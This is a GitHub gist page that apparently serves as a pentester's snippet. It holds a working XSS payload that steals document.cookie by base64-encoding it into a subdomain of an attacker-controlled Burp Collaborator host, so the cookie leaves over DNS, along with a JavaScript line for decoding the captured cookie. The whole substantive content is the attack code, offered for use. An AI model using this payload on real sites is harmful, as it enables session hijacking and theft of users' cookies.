nongiach/xssdnss.md

Created December 27, 2019 00:13

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/nongiach/76c18ba498a231e82a93c4a7a8c5c0b3.js"></script>
Save nongiach/76c18ba498a231e82a93c4a7a8c5c0b3 to your computer and use it in GitHub Desktop.

Download ZIP

Raw

Bellow to exfiltrate cookie over DNS when doing XSS

<script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script>

Bellow to decode the cookie, make sure to ignore the I. at the end and replace the x with = at the end

atob("Your_Receveived_DNS".replace(/(.)./g, (_,x)=>x.toUpperCase()))

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment